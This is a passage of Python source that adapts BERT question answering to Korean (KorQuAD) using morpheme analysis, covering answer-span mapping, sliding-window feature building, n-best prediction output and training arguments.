example_index\n\t\tself.doc_span_index = doc_span_index\n\t\tself.tokens = tokens\n\t\tself.token_to_orig_map = token_to_orig_map\n\t\tself.token_is_max_context = token_is_max_context\n\t\tself.input_ids = input_ids\n\t\tself.input_mask = input_mask\n\t\tself.segment_ids = segment_ids\n\t\tself.start_position = start_position\n\t\tself.end_position = end_position\n\n\t\t\n##########################################################\n### joonho.lim @ 2019-03-15\n### convert language anlysis result to inner data structure\ndef represent_ndoc ( ndoc ) :\n\ttext = ''\n\tmorp_list = []\n\tposition_list = []\n\t\n\tfor sentence in ndoc['sentence'] :\n\t\ttext += sentence['text']\n\t\tbegin_morp_id = len(morp_list)\n\t\t\n\t\tfor morp in sentence['morp'] :\n\t\t\tmorp_list.append( morp['lemma'] + '/' + morp['type'] )\n\t\t\tposition_list.append( int(morp['position']) )\n\t\n\treturn { 'text': text, 'morp_list':morp_list, 'position_list':position_list }\n\t\n\t\n##########################################################\n### joonho.lim @ 2019-03-15\n### convert byte answer position to morphology analysis index\ndef mapping_answer_korquad ( p_json, rep_p, answer_text, answer_start, answer_end=-1 ) :\n\tanswer_start = int(answer_start)\n\tanswer_end = int(answer_end)\n\tif answer_end == -1 :\n\t\tanswer_end = answer_start + len(answer_text)\n\tif answer_text != rep_p['text'][answer_start:answer_end] :\n\t\tlogger.info ( '[mapping_answer_korquad error]\\t%s\\t%s' % (answer_text, rep_p['text'][answer_start:answer_end]) )\n\t\treturn None\n\t\n\tbyte_answer_start = len( rep_p['text'][:answer_start].encode() )\n\tbyte_answer_end = len( rep_p['text'][:answer_end].encode() )\n\t\n\tbase_morp_id = 0\n\tbegin_morp_id = end_morp_id = -1\n\tfor sent_i, sentence in enumerate( p_json['sentence'] ) :\n\t\tif byte_answer_start > sentence['morp'][-1]['position'] and byte_answer_end > sentence['morp'][-1]['position'] :\n\t\t\tbase_morp_id += len(sentence['morp'])\n\t\t\tcontinue\n\t\t\t\n\t\tif begin_morp_id == -1 :\n\t\t\tfor morp_i, morp in enumerate(sentence['morp']) 
:\n\t\t\t\tif morp['position'] == byte_answer_start :\n\t\t\t\t\tbegin_morp_id = base_morp_id + morp_i\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] < byte_answer_start and morp_i+1 < len(sentence['morp']) and byte_answer_start < sentence['morp'][morp_i+1]['position'] :\n\t\t\t\t\tbegin_morp_id = base_morp_id + morp_i\n\t\t\t\t\tlogger.info ('[begin not exact match] %s\\t->\\t%s' % (answer_text, morp['lemma']) )\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] > byte_answer_start :\n\t\t\t\t\tbegin_morp_id = base_morp_id + morp_i\n\t\t\t\t\tlogger.info ('[begin error] %s\\t->\\t%s' % (answer_text, morp['lemma']) )\n\t\t\t\t\tbreak\n\t\t\n\t\tif begin_morp_id != -1 and end_morp_id == -1 and byte_answer_end <= sentence['morp'][-1]['position']+len(sentence['morp'][-1]['lemma'].encode()) :\n\t\t\tfor morp_i in range( len(sentence['morp'])-1, -1, -1 ) :\n\t\t\t\tmorp = sentence['morp'][morp_i]\n\t\t\t\tif morp['position'] == byte_answer_end :\n\t\t\t\t\tend_morp_id = base_morp_id + morp_i - 1\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] < byte_answer_end and byte_answer_end <= morp['position']+len(morp['lemma'].encode()) :\n\t\t\t\t\tend_morp_id = base_morp_id + morp_i\n\t\t\t\t\tbreak\n\t\t\t\telif morp['position'] < byte_answer_end :\n\t\t\t\t\tend_morp_id = base_morp_id + morp_i\n\t\t\t\t\tlogger.info ('[end error] %s\\t->\\t%s' % (text, morp['lemma']) )\n\t\t\t\t\tbreak\n\t\t\t\n\t\tbase_morp_id += len(sentence['morp'])\n\t\n\tif begin_morp_id == -1 or end_morp_id == -1 :\n\t\treturn None\n\t\n\tp_text_bytes = rep_p['text'].encode()\n\tbegin_pos = rep_p['position_list'][begin_morp_id]\n\tend_pos = len(p_text_bytes)\n\tif end_morp_id+1 < len(rep_p['position_list']): end_pos = rep_p['position_list'][end_morp_id+1]\n\tpred_text = p_text_bytes[ begin_pos : end_pos ].decode().strip()\n\tif answer_text != pred_text :\n\t\tlogger.info ('[check morp index] %s\\t%s' % (answer_text, pred_text) )\n\t\t\n\treturn { 'begin_morp':begin_morp_id, 'end_morp':end_morp_id, 'text':answer_text }\n\t\n\n\n\t\t\n##########################################################\n### joonho.lim @ 2019-03-15\n### do morphology analysis using OpenAPI service\ndef do_lang ( openapi_key, text ) :\n\topenApiURL = \"http://aiopen.etri.re.kr:8000/WiseNLU\"\n\t \n\trequestJson = { \"access_key\": openapi_key, \"argument\": { \"text\": text, \"analysis_code\": \"morp\" } }\n\t \n\thttp = urllib3.PoolManager()\n\tresponse = http.request( \"POST\", openApiURL, headers={\"Content-Type\": \"application/json; charset=UTF-8\"}, body=json.dumps(requestJson) )\n\n\treturn response.data.decode()\n\n\n##########################################################\n### joonho.lim @ 2019-03-15\n### read squad example file and do morphology analysis\n### junho @ using tokenized file for tokenize sentence instead of open API\ndef read_squad_examples_and_do_lang(input_file, is_training, Tokenizing):\n\t\"\"\"Read a SQuAD json file into a list of SquadExample.\"\"\"\n\tif os.path.isfile(input_file) == False :\n\t\traise ValueError(\"not exist file or folder : %s\" % input_file)\n\t\t\n\twith open(input_file, \"r\", encoding='utf-8') as reader:\n\t\tinput_data = json.load(reader)\n\n\tpqa_list = []\n\tfor paragraphs_title in input_data['data'] :\n\t\tfor pq in paragraphs_title['paragraphs'] :\n\t\t\tpassage_text = pq['context']\n\n\t\t\t# origin\n\t\t\t# passage_lang = do_lang( openapi_key, passage_text )\n\t\t\t# junho @ use tokenized file\n\t\t\tpassage_lang = Tokenizing[passage_text][0]\n\n\t\t\tp_json = 
json.loads(passage_lang)['return_object']\n\t\t\trep_p = represent_ndoc(p_json)\n\n\t\t\tfor qa in pq['qas'] :\n\t\t\t\tqas_id = qa['id']\n\t\t\t\tquestion_text = qa['question'].strip()\n\t\t\t\t# origin\n\t\t\t\t# question_lang = do_lang( openapi_key, question_text )\n\t\t\t\tquestion_lang = Tokenizing[question_text] # 바로 사용 가능\n\t\t\t\t# junho @ use tokenized file\n\t\t\t\tq_json = json.loads(question_lang)['return_object']\n\n\t\t\t\trep_q = represent_ndoc(q_json)\n\t\t\t\t\n\t\t\t\trep_a = {}\n\t\t\t\tif is_training :\n\t\t\t\t\trep_a = mapping_answer_korquad( p_json, rep_p, qa['answers'][0]['text'], qa['answers'][0]['answer_start'] )\n\t\t\t\n\t\t\t\tpqa_list.append( {'id':qas_id, 'passage':rep_p, 'question':rep_q, 'answer':rep_a} )\n\n\n\treturn read_squad_examples(pqa_list, is_training)\n\n\ndef read_squad_examples(input_data, is_training):\n\t\"\"\"Read a SQuAD json file into a list of SquadExample.\"\"\"\n\texamples = []\n\terrorCount=0\n\tfor pqa in input_data :\n\t\ta_raw_text = None\n\t\ta_morp_token = None\n\t\ta_begin_morp = None\n\t\ta_end_morp = None\n\n\n\t\tif pqa['answer'] == None :\n\t\t\terrorCount += 1\n\t\t\tprint(\"데이터 오류 \",errorCount, \" \", pqa['passage'])\n\t\telse :\n\t\t\tif is_training:\n\t\t\t\ta_raw_text = pqa['answer']['text']\n\t\t\t\ta_begin_morp = pqa['answer']['begin_morp']\n\t\t\t\ta_end_morp = pqa['answer']['end_morp']\n\t\t\t\ta_morp_token = pqa['passage']['morp_list'][a_begin_morp : a_end_morp+1]\n\n\t\t\texample = SquadExample(\n\t\t\t\tqas_id = pqa['id'],\n\t\t\t\tq_raw_text = pqa['question']['text'],\n\t\t\t\tq_morp_token = pqa['question']['morp_list'],\n\t\t\t\tp_raw_text = pqa['passage']['text'],\n\t\t\t\tp_morp_token = pqa['passage']['morp_list'],\n\t\t\t\tp_morp_position_list = pqa['passage']['position_list'],\n\t\t\t\ta_raw_text = a_raw_text,\n\t\t\t\ta_morp_token = a_morp_token,\n\t\t\t\ta_begin_morp = a_begin_morp,\n\t\t\t\ta_end_morp = a_end_morp)\n\t\t\texamples.append(example)\n\n\t\tlogger.info( 'len(examples) : %d'% len(examples) )\n\treturn examples\t\t\n\t\t\n\ndef convert_examples_to_features(examples, tokenizer, max_seq_length,\n\t\t\t\t\t\t\t\t doc_stride, max_query_length, is_training, verbose=True):\n\t\"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"\n\n\tunique_id = 1000000000\n\n\tfeatures = []\n\tfor (example_index, example) in enumerate(examples):\n\t\tquery_tokens = []\n\t\tfor q_morp in example.q_morp_token :\n\t\t\tquery_tokens.extend( tokenizer.tokenize(q_morp) )\n\t\tif len(query_tokens) > max_query_length:\n\t\t\tquery_tokens = query_tokens[0:max_query_length]\n\t\t\n\t\ttok_to_orig_index = []\n\t\torig_to_tok_index = []\n\t\tall_doc_tokens = []\n\t\tfor (i, token) in enumerate(example.p_morp_token):\n\t\t\torig_to_tok_index.append(len(all_doc_tokens))\n\t\t\tsub_tokens = tokenizer.tokenize(token)\n\t\t\tfor sub_token in sub_tokens:\n\t\t\t\ttok_to_orig_index.append(i)\n\t\t\t\tall_doc_tokens.append(sub_token)\n\n\t\ttok_start_position = None\n\t\ttok_end_position = None\n\t\tif is_training:\n\t\t\ttok_start_position = orig_to_tok_index[ example.a_begin_morp ]\n\t\t\tif example.a_end_morp+1 < len(orig_to_tok_index) :\n\t\t\t\ttok_end_position = orig_to_tok_index[ example.a_end_morp+1 ] - 1\n\t\t\telse :\n\t\t\t\ttok_end_position = orig_to_tok_index[ -1 ]\n\n\t\t\t\t\n\t\t# The -3 accounts for [CLS], [SEP] and [SEP]\n\t\tmax_tokens_for_doc = max_seq_length - len(query_tokens) - 3\n\n\t\t# We can have documents that are longer than the maximum sequence length.\n\t\t# To deal with this we do a sliding window 
approach, where we take chunks\n\t\t# of the up to our max length with a stride of `doc_stride`.\n\t\t_DocSpan = collections.namedtuple( # pylint: disable=invalid-name\n\t\t\t\"DocSpan\", [\"start\", \"length\"])\n\t\tdoc_spans = []\n\t\tstart_offset = 0\n\t\twhile start_offset < len(all_doc_tokens):\n\t\t\tlength = len(all_doc_tokens) - start_offset\n\t\t\tif length > max_tokens_for_doc:\n\t\t\t\tlength = max_tokens_for_doc\n\t\t\tdoc_spans.append(_DocSpan(start=start_offset, length=length))\n\t\t\tif start_offset + length == len(all_doc_tokens):\n\t\t\t\tbreak\n\t\t\tstart_offset += min(length, doc_stride)\n\n\t\tfor (doc_span_index, doc_span) in enumerate(doc_spans):\n\t\t\ttokens = []\n\t\t\ttoken_to_orig_map = {}\n\t\t\ttoken_is_max_context = {}\n\t\t\tsegment_ids = []\n\t\t\ttokens.append(\"[CLS]\")\n\t\t\tsegment_ids.append(0)\n\t\t\tfor token in query_tokens:\n\t\t\t\ttokens.append(token)\n\t\t\t\tsegment_ids.append(0)\n\t\t\ttokens.append(\"[SEP]\")\n\t\t\tsegment_ids.append(0)\n\n\t\t\tfor i in range(doc_span.length):\n\t\t\t\tsplit_token_index = doc_span.start + i\n\t\t\t\ttoken_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n\t\t\t\tis_max_context = _check_is_max_context(doc_spans, doc_span_index,\n\t\t\t\t\t\t\t\t\t\t\t\t\t split_token_index)\n\t\t\t\ttoken_is_max_context[len(tokens)] = is_max_context\n\t\t\t\ttokens.append(all_doc_tokens[split_token_index])\n\t\t\t\tsegment_ids.append(1)\n\t\t\ttokens.append(\"[SEP]\")\n\t\t\tsegment_ids.append(1)\n\n\t\t\tinput_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n\t\t\t# The mask has 1 for real tokens and 0 for padding tokens. Only real\n\t\t\t# tokens are attended to.\n\t\t\tinput_mask = [1] * len(input_ids)\n\n\t\t\t# Zero-pad up to the sequence length.\n\t\t\twhile len(input_ids) < max_seq_length:\n\t\t\t\tinput_ids.append(0)\n\t\t\t\tinput_mask.append(0)\n\t\t\t\tsegment_ids.append(0)\n\n\t\t\tassert len(input_ids) == max_seq_length\n\t\t\tassert len(input_mask) == max_seq_length\n\t\t\tassert len(segment_ids) == max_seq_length\n\n\t\t\tstart_position = None\n\t\t\tend_position = None\n\t\t\tif is_training:\n\t\t\t\t# For training, if our document chunk does not contain an annotation\n\t\t\t\t# we throw it out, since there is nothing to predict.\n\t\t\t\tdoc_start = doc_span.start\n\t\t\t\tdoc_end = doc_span.start + doc_span.length - 1\n\t\t\t\tif (example.a_begin_morp < doc_start or\n\t\t\t\t\t\texample.a_end_morp < doc_start or\n\t\t\t\t\t\texample.a_begin_morp > doc_end or example.a_end_morp > doc_end):\n\t\t\t\t\tcontinue\n\n\t\t\t\tdoc_offset = len(query_tokens) + 2\n\t\t\t\tstart_position = tok_start_position - doc_start + doc_offset\n\t\t\t\tend_position = tok_end_position - doc_start + doc_offset\n\n\t\t\tif verbose == True and example_index < 10:\n\t\t\t\tlogger.info(\"*** Example ***\")\n\t\t\t\tlogger.info(\"unique_id: %s\" % (unique_id))\n\t\t\t\tlogger.info(\"example_index: %s\" % (example_index))\n\t\t\t\tlogger.info(\"doc_span_index: %s\" % (doc_span_index))\n\t\t\t\tlogger.info(\"tokens: %s\" % \" \".join(tokens))\n\t\t\t\tlogger.info(\"token_to_orig_map: %s\" % \" \".join([\n\t\t\t\t\t\"%d:%d\" % (x, y) for (x, y) in token_to_orig_map.items()]))\n\t\t\t\tlogger.info(\"token_is_max_context: %s\" % \" \".join([\n\t\t\t\t\t\"%d:%s\" % (x, y) for (x, y) in token_is_max_context.items()\n\t\t\t\t]))\n\t\t\t\tlogger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n\t\t\t\tlogger.info(\n\t\t\t\t\t\"input_mask: %s\" % \" \".join([str(x) for x in 
input_mask]))\n\t\t\t\tlogger.info(\n\t\t\t\t\t\"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n\t\t\t\tif is_training:\n\t\t\t\t\tanswer_text = \" \".join(tokens[start_position:(end_position + 1)])\n\t\t\t\t\tlogger.info(\"start_position: %d\" % (start_position))\n\t\t\t\t\tlogger.info(\"end_position: %d\" % (end_position))\n\t\t\t\t\tlogger.info(\"answer: %s\" % (answer_text))\n\t\t\t\t\tlogger.info(\"orig_answer: %s\" % (example.a_raw_text))\n\n\t\t\tfeatures.append(\n\t\t\t\tInputFeatures(\n\t\t\t\t\tunique_id=unique_id,\n\t\t\t\t\texample_index=example_index,\n\t\t\t\t\tdoc_span_index=doc_span_index,\n\t\t\t\t\ttokens=tokens,\n\t\t\t\t\ttoken_to_orig_map=token_to_orig_map,\n\t\t\t\t\ttoken_is_max_context=token_is_max_context,\n\t\t\t\t\tinput_ids=input_ids,\n\t\t\t\t\tinput_mask=input_mask,\n\t\t\t\t\tsegment_ids=segment_ids,\n\t\t\t\t\tstart_position=start_position,\n\t\t\t\t\tend_position=end_position))\n\t\t\tunique_id += 1\n\n\treturn features\n\n\n\ndef _check_is_max_context(doc_spans, cur_span_index, position):\n\t\"\"\"Check if this is the 'max context' doc span for the token.\"\"\"\n\n\t# Because of the sliding window approach taken to scoring documents, a single\n\t# token can appear in multiple documents. E.g.\n\t# Doc: the man went to the store and bought a gallon of milk\n\t# Span A: the man went to the\n\t# Span B: to the store and bought\n\t# Span C: and bought a gallon of\n\t# ...\n\t#\n\t# Now the word 'bought' will have two scores from spans B and C. We only\n\t# want to consider the score with \"maximum context\", which we define as\n\t# the *minimum* of its left and right context (the *sum* of left and\n\t# right context will always be the same, of course).\n\t#\n\t# In the example the maximum context for 'bought' would be span C since\n\t# it has 1 left context and 3 right context, while span B has 4 left context\n\t# and 0 right context.\n\tbest_score = None\n\tbest_span_index = None\n\tfor (span_index, doc_span) in enumerate(doc_spans):\n\t\tend = doc_span.start + doc_span.length - 1\n\t\tif position < doc_span.start:\n\t\t\tcontinue\n\t\tif position > end:\n\t\t\tcontinue\n\t\tnum_left_context = position - doc_span.start\n\t\tnum_right_context = end - position\n\t\tscore = min(num_left_context, num_right_context) + 0.01 * doc_span.length\n\t\tif best_score is None or score > best_score:\n\t\t\tbest_score = score\n\t\t\tbest_span_index = span_index\n\n\treturn cur_span_index == best_span_index\n\n\n\nRawResult = collections.namedtuple(\"RawResult\",\n\t\t\t\t\t\t\t\t [\"unique_id\", \"start_logits\", \"end_logits\"])\n\n\ndef write_predictions(all_examples, all_features, all_results, n_best_size,\n\t\t\t\t\t max_answer_length, do_lower_case, output_prediction_file,\n\t\t\t\t\t output_nbest_file, verbose_logging):\n\t\"\"\"Write final predictions to the json file.\"\"\"\n\tlogger.info(\"Writing predictions to: %s\" % (output_prediction_file))\n\tlogger.info(\"Writing nbest to: %s\" % (output_nbest_file))\n\n\n\t(all_predictions, all_nbest_json) = get_predictions( \n\t\t\t\t\tall_examples, all_features, all_results, n_best_size,\n\t\t\t\t\t max_answer_length, do_lower_case, verbose_logging )\n\n\n\n\twith open(output_prediction_file, \"w\") as writer:\n\t\twriter.write(json.dumps(all_predictions, indent=4,ensure_ascii=False) + \"\\n\")\n\n\twith open(output_nbest_file, \"w\") as writer:\n\t\twriter.write(json.dumps(all_nbest_json, indent=4,ensure_ascii=False) + \"\\n\")\n\n\n\treturn all_predictions\n\n\ndef get_predictions(all_examples, 
all_features, all_results, n_best_size,\n\t\t\t\t\t max_answer_length, do_lower_case, verbose_logging):\n\n\texample_index_to_features = collections.defaultdict(list)\n\tfor feature in all_features:\n\t\texample_index_to_features[feature.example_index].append(feature)\n\n\tunique_id_to_result = {}\n\tfor result in all_results:\n\t\tunique_id_to_result[result.unique_id] = result\n\n\t_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name\n\t\t\"PrelimPrediction\",\n\t\t[\"feature_index\", \"start_index\", \"end_index\", \"start_logit\", \"end_logit\"])\n\n\tall_predictions = collections.OrderedDict()\n\tall_nbest_json = collections.OrderedDict()\n\tfor (example_index, example) in enumerate(all_examples):\n\t\tfeatures = example_index_to_features[example_index]\n\n\t\tprelim_predictions = []\n\t\tfor (feature_index, feature) in enumerate(features):\n\t\t\tresult = unique_id_to_result[feature.unique_id]\n\n\t\t\tstart_indexes = _get_best_indexes(result.start_logits, n_best_size)\n\t\t\tend_indexes = _get_best_indexes(result.end_logits, n_best_size)\n\t\t\tfor start_index in start_indexes:\n\t\t\t\tfor end_index in end_indexes:\n\t\t\t\t\t# We could hypothetically create invalid predictions, e.g., predict\n\t\t\t\t\t# that the start of the span is in the question. We throw out all\n\t\t\t\t\t# invalid predictions.\n\t\t\t\t\tif start_index >= len(feature.tokens):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif end_index >= len(feature.tokens):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif start_index not in feature.token_to_orig_map:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif end_index not in feature.token_to_orig_map:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif not feature.token_is_max_context.get(start_index, False):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif end_index < start_index:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tlength = end_index - start_index + 1\n\t\t\t\t\tif length > max_answer_length:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tprelim_predictions.append(\n\t\t\t\t\t\t_PrelimPrediction(\n\t\t\t\t\t\t\tfeature_index=feature_index,\n\t\t\t\t\t\t\tstart_index=start_index,\n\t\t\t\t\t\t\tend_index=end_index,\n\t\t\t\t\t\t\tstart_logit=result.start_logits[start_index],\n\t\t\t\t\t\t\tend_logit=result.end_logits[end_index]))\n\n\t\tprelim_predictions = sorted(\n\t\t\tprelim_predictions,\n\t\t\tkey=lambda x: (x.start_logit + x.end_logit),\n\t\t\treverse=True)\n\n\t\t_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name\n\t\t\t\"NbestPrediction\", [\"text\", \"start_logit\", \"end_logit\"])\n\n\t\tseen_predictions = {}\n\t\tnbest = []\n\t\tfor pred in prelim_predictions:\n\t\t\tif len(nbest) >= n_best_size:\n\t\t\t\tbreak\n\t\t\tfeature = features[pred.feature_index]\n\n\t\t\t##########################################################\n\t\t\t### joonho.lim @ 2019-03-15\n\t\t\t### extract final text\n\t\t\ttok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]\n\t\t\torig_doc_start = feature.token_to_orig_map[pred.start_index]\n\t\t\torig_doc_end = feature.token_to_orig_map[pred.end_index]\n\t\t\t\n\t\t\tp_begin_morp = example.p_morp_position_list[ orig_doc_start ]\n\t\t\tp_end_morp = example.p_morp_position_list[ orig_doc_end+1 ]\n\t\t\t\n\t\t\tfinal_text = example.p_raw_bytes[ p_begin_morp:p_end_morp ].decode().strip()\n\t\t\t\n\t\t\tif final_text in seen_predictions:\n\t\t\t\tcontinue\n\n\t\t\tseen_predictions[final_text] = True\n\t\t\tnbest.append(\n\t\t\t\t_NbestPrediction(\n\t\t\t\t\ttext=final_text,\n\t\t\t\t\tstart_logit=pred.start_logit,\n\t\t\t\t\tend_logit=pred.end_logit))\n\n\t\t# In 
very rare edge cases we could have no valid predictions. So we\n\t\t# just create a nonce prediction in this case to avoid failure.\n\t\tif not nbest:\n\t\t\tnbest.append(\n\t\t\t\t_NbestPrediction(text=\"empty\", start_logit=0.0, end_logit=0.0))\n\n\t\tassert len(nbest) >= 1\n\n\t\ttotal_scores = []\n\t\tfor entry in nbest:\n\t\t\ttotal_scores.append(entry.start_logit + entry.end_logit)\n\n\t\tprobs = _compute_softmax(total_scores)\n\n\t\tnbest_json = []\n\t\tfor (i, entry) in enumerate(nbest):\n\t\t\toutput = collections.OrderedDict()\n\t\t\toutput[\"text\"] = entry.text\n\t\t\toutput[\"probability\"] = probs[i]\n\t\t\toutput[\"start_logit\"] = entry.start_logit\n\t\t\toutput[\"end_logit\"] = entry.end_logit\n\t\t\tnbest_json.append(output)\n\n\t\tassert len(nbest_json) >= 1\n\n\t\tall_predictions[example.qas_id] = nbest_json[0][\"text\"]\n\t\tall_nbest_json[example.qas_id] = nbest_json\n\n\treturn (all_predictions, all_nbest_json)\n\n\t\ndef get_final_text(pred_text, orig_text, do_lower_case, verbose_logging=False):\n\t\"\"\"Project the tokenized prediction back to the original text.\"\"\"\n\n\t# When we created the data, we kept track of the alignment between original\n\t# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So\n\t# now `orig_text` contains the span of our original text corresponding to the\n\t# span that we predicted.\n\t#\n\t# However, `orig_text` may contain extra characters that we don't want in\n\t# our prediction.\n\t#\n\t# For example, let's say:\n\t# pred_text = steve smith\n\t# orig_text = Steve Smith's\n\t#\n\t# We don't want to return `orig_text` because it contains the extra \"'s\".\n\t#\n\t# We don't want to return `pred_text` because it's already been normalized\n\t# (the SQuAD eval script also does punctuation stripping/lower casing but\n\t# our tokenizer does additional normalization like stripping accent\n\t# characters).\n\t#\n\t# What we really want to return is \"Steve Smith\".\n\t#\n\t# Therefore, we have to apply a semi-complicated alignment heruistic between\n\t# `pred_text` and `orig_text` to get a character-to-charcter alignment. This\n\t# can fail in certain cases in which case we just return `orig_text`.\n\n\tdef _strip_spaces(text):\n\t\tns_chars = []\n\t\tns_to_s_map = collections.OrderedDict()\n\t\tfor (i, c) in enumerate(text):\n\t\t\tif c == \" \":\n\t\t\t\tcontinue\n\t\t\tns_to_s_map[len(ns_chars)] = i\n\t\t\tns_chars.append(c)\n\t\tns_text = \"\".join(ns_chars)\n\t\treturn (ns_text, ns_to_s_map)\n\n\t# We first tokenize `orig_text`, strip whitespace from the result\n\t# and `pred_text`, and check if they are the same length. If they are\n\t# NOT the same length, the heuristic has failed. 
If they are the same\n\t# length, we assume the characters are one-to-one aligned.\n\ttokenizer = BasicTokenizer(do_lower_case=do_lower_case)\n\n\ttok_text = \" \".join(tokenizer.tokenize(orig_text))\n\n\tstart_position = tok_text.find(pred_text)\n\tif start_position == -1:\n\t\tif verbose_logging:\n\t\t\tlogger.info(\n\t\t\t\t\"Unable to find text: '%s' in '%s'\" % (pred_text, orig_text))\n\t\treturn orig_text\n\tend_position = start_position + len(pred_text) - 1\n\n\t(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)\n\t(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)\n\n\tif len(orig_ns_text) != len(tok_ns_text):\n\t\tif verbose_logging:\n\t\t\tlogger.info(\"Length not equal after stripping spaces: '%s' vs '%s'\",\n\t\t\t\t\t\t\torig_ns_text, tok_ns_text)\n\t\treturn orig_text\n\n\t# We then project the characters in `pred_text` back to `orig_text` using\n\t# the character-to-character alignment.\n\ttok_s_to_ns_map = {}\n\tfor (i, tok_index) in tok_ns_to_s_map.items():\n\t\ttok_s_to_ns_map[tok_index] = i\n\n\torig_start_position = None\n\tif start_position in tok_s_to_ns_map:\n\t\tns_start_position = tok_s_to_ns_map[start_position]\n\t\tif ns_start_position in orig_ns_to_s_map:\n\t\t\torig_start_position = orig_ns_to_s_map[ns_start_position]\n\n\tif orig_start_position is None:\n\t\tif verbose_logging:\n\t\t\tlogger.info(\"Couldn't map start position\")\n\t\treturn orig_text\n\n\torig_end_position = None\n\tif end_position in tok_s_to_ns_map:\n\t\tns_end_position = tok_s_to_ns_map[end_position]\n\t\tif ns_end_position in orig_ns_to_s_map:\n\t\t\torig_end_position = orig_ns_to_s_map[ns_end_position]\n\n\tif orig_end_position is None:\n\t\tif verbose_logging:\n\t\t\tlogger.info(\"Couldn't map end position\")\n\t\treturn orig_text\n\n\toutput_text = orig_text[orig_start_position:(orig_end_position + 1)]\n\treturn output_text\n\n\ndef _get_best_indexes(logits, n_best_size):\n\t\"\"\"Get the n-best logits from a list.\"\"\"\n\tindex_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)\n\n\tbest_indexes = []\n\tfor i in range(len(index_and_score)):\n\t\tif i >= n_best_size:\n\t\t\tbreak\n\t\tbest_indexes.append(index_and_score[i][0])\n\treturn best_indexes\n\n\ndef _compute_softmax(scores):\n\t\"\"\"Compute softmax probability over raw logits.\"\"\"\n\tif not scores:\n\t\treturn []\n\n\tmax_score = None\n\tfor score in scores:\n\t\tif max_score is None or score > max_score:\n\t\t\tmax_score = score\n\n\texp_scores = []\n\ttotal_sum = 0.0\n\tfor score in scores:\n\t\tx = math.exp(score - max_score)\n\t\texp_scores.append(x)\n\t\ttotal_sum += x\n\n\tprobs = []\n\tfor score in exp_scores:\n\t\tprobs.append(score / total_sum)\n\treturn probs\n\ndef warmup_linear(x, warmup=0.002):\n\tif x < warmup:\n\t\treturn x/warmup\n\treturn 1.0 - x\n\n\ndef parser_add_argument\t( parser ) :\n\t## Required parameters\n\tparser.add_argument(\"--bert_model\", default=\"..\", type=str, required=True,\n\t\t\t\t\t\thelp=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n\t\t\t\t\t\t\"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n\t\t\t\t\t\t\"bert-base-multilingual-cased, bert-base-chinese.\")\n\t# junho. 
Use tokenized file which include original sentence and tokenized sentence instead of openapi key\n\tparser.add_argument('--tokenized_file',\n\t\t\t\t\t\ttype=str, required=True, default=\"../../data/tokenizing.json\",\n\t\t\t\t\t\thelp=\"Tokenizing file\")\n\n\n\t## Other parameters\n\tparser.add_argument(\"--openapi_key\", default=\"key\", type=str, help=\"OpenAPI key information for morphology analysis\")\n\tparser.add_argument(\"--bert_model_file\", default=\"pytorch_model.bin\", type=str, help=\"specific model file (i.e. pytorch_model.bin)\")\n\tparser.add_argument(\"--vocab_file\", default=\"vocab.korean_morp.list\", type=str, help=\"specific vocab file (i.e. vocab.txt)\")\n\tparser.add_argument(\"--output_dir\", default=\"../../outputDir/EtriBERT\", type=str,\n\t\t\t\t\t\thelp=\"The output directory where the model checkpoints and predictions will be written.\")\n\n\tparser.add_argument(\"--train_file\", default=\"../../data/train.json\", type=str, help=\"SQuAD json for training. E.g., train-v1.1.json\")\n\tparser.add_argument(\"--predict_file\", default=\"../../data/test.json\", type=str,\n\t\t\t\t\t\thelp=\"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json\")\n\tparser.add_argument(\"--eval_folder\", default=None, type=str, help=\"SQuAD json folder for test performance\")\n\tparser.add_argument(\"--max_seq_length\", default=512, type=int,\n\t\t\t\t\t\thelp=\"The maximum total input sequence length after WordPiece tokenization. Sequences \"\n\t\t\t\t\t\t\t \"longer than this will be truncated, and sequences shorter than this will be padded.\")\n\tparser.add_argument(\"--doc_stride\", default=128, type=int,\n\t\t\t\t\t\thelp=\"When splitting up a long document into chunks, how much stride to take between chunks.\")\n\tparser.add_argument(\"--max_query_length\", default=128, type=int,\n\t\t\t\t\t\thelp=\"The maximum number of tokens for the question. Questions longer than this will \"\n\t\t\t\t\t\t\t \"be truncated to this length.\")\n\tparser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\")\n\tparser.add_argument(\"--do_predict\", action='store_true', help=\"Whether to run eval on the dev set.\")\n\tparser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\")\n\tparser.add_argument(\"--predict_batch_size\", default=4, type=int, help=\"Total batch size for predictions.\")\n\tparser.add_argument(\"--learning_rate\", default=3e-5, type=float, help=\"The initial learning rate for Adam.\")\n\tparser.add_argument(\"--num_train_epochs\", default=2.0, type=float,\n\t\t\t\t\t\thelp=\"Total number of training epochs to perform.\")\n\tparser.add_argument(\"--warmup_proportion\", default=0.1, type=float,\n\t\t\t\t\t\thelp=\"Proportion of training to perform linear learning rate warmup for. E.g., 0.1 = 10% \"\n\t\t\t\t\t\t\t \"of training.\")\n\tparser.add_argument(\"--n_best_size\", default=20, type=int,\n\t\t\t\t\t\thelp=\"The total number of n-best predictions to generate in the nbest_predictions.json \"\n\t\t\t\t\t\t\t \"output 